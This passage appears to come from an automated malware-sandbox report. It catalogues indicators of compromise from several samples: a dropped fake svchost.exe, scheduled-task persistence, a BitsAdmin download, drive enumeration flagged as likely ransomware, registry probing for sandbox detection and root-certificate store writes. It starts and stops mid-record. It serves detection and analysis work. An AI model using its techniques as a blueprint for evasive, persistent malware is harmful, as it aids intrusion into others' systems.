autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll autosubplayer.exe -
Drops file in Windows directory 29 IoCs
Processes:
CPrpRnM8IeYXmA2gAu6BvtNE.exemsiexec.exeMsiExec.exesvchost.exedescription ioc process File created C:\Windows\System\xxx1.bak CPrpRnM8IeYXmA2gAu6BvtNE.exe File created C:\Windows\System\svchost.exe CPrpRnM8IeYXmA2gAu6BvtNE.exe File created C:\Windows\Installer\f767386.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI2695.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2696.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID281.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF0C61599C28D475CA.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI847E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI94CB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI101C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5AF7.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIDD4F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4839.tmp msiexec.exe File opened for modification C:\Windows\Installer\f767386.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DF61F58F935AB299F1.TMP msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Installer\MSI576C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE7F0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEB4C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1CC0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE0EA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI20A9.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\System\svchost.exe CPrpRnM8IeYXmA2gAu6BvtNE.exe File created C:\Windows\System\xxx1.bak svchost.exe File opened for modification C:\Windows\Installer\MSI53E.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 18 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3692 1244 WerFault.exe RD7xOcy3VQHmAwSgZbhezd8B.exe 4864 3036 WerFault.exe QYUmrdKRz8BDDtM93WnnT1fs.exe 5036 1744 WerFault.exe 3Epq67p4ckusTei5nXzNLNK0.exe 5844 1284 WerFault.exe koWWz0CDL9D_1Drwoq08LvCC.exe 5000 1552 WerFault.exe 2cueFNHmLXQajzNJ90hDfGNw.exe 5988 5648 WerFault.exe rundll32.exe 3948 5712 WerFault.exe MgfK7sdY6ayqDIIEjBhcUIUp.exe 5936 5328 WerFault.exe _52YqC1xoN2nJyiPlEUAxEMy.exe 7252 3036 WerFault.exe 66CA.exe 7408 4668 WerFault.exe C161.exe 7660 6844 WerFault.exe D5C4.exe 7704 7492 WerFault.exe explorer.exe 8108 7968 WerFault.exe rundll32.exe 8264 6860 WerFault.exe GcleanerEU.exe 8496 7172 WerFault.exe gcleaner.exe 10192 8720 WerFault.exe 692D.exe 12536 9720 WerFault.exe 9D0F.exe 5668 6816 WerFault.exe 6FA7.exe -
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\iZ4M1J96Sntem8227kHDdgjJ.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\iZ4M1J96Sntem8227kHDdgjJ.exe nsis_installer_2 C:\Users\Admin\Pictures\Adobe Films\iZ4M1J96Sntem8227kHDdgjJ.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\iZ4M1J96Sntem8227kHDdgjJ.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
99B3.exehrhEFdag2pQKmAwA8AOXAH5Z.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 99B3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 99B3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 99B3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hrhEFdag2pQKmAwA8AOXAH5Z.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hrhEFdag2pQKmAwA8AOXAH5Z.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hrhEFdag2pQKmAwA8AOXAH5Z.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2996 schtasks.exe 3256 schtasks.exe 5924 schtasks.exe 8296 schtasks.exe 15512 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 37 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 9556 taskkill.exe 3992 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
sihclient.exesvchost.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe -
Modifies registry class 8 IoCs
Processes:
Calculator.exeCalculator.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{D0E8560A-75B5-4D9F-B293-1E57B8FE2536} Calculator.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{91178DFE-973F-44FD-A0B0-3F6056E1AFF6} Calculator.exe -
Processes:
installer.exeSetup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802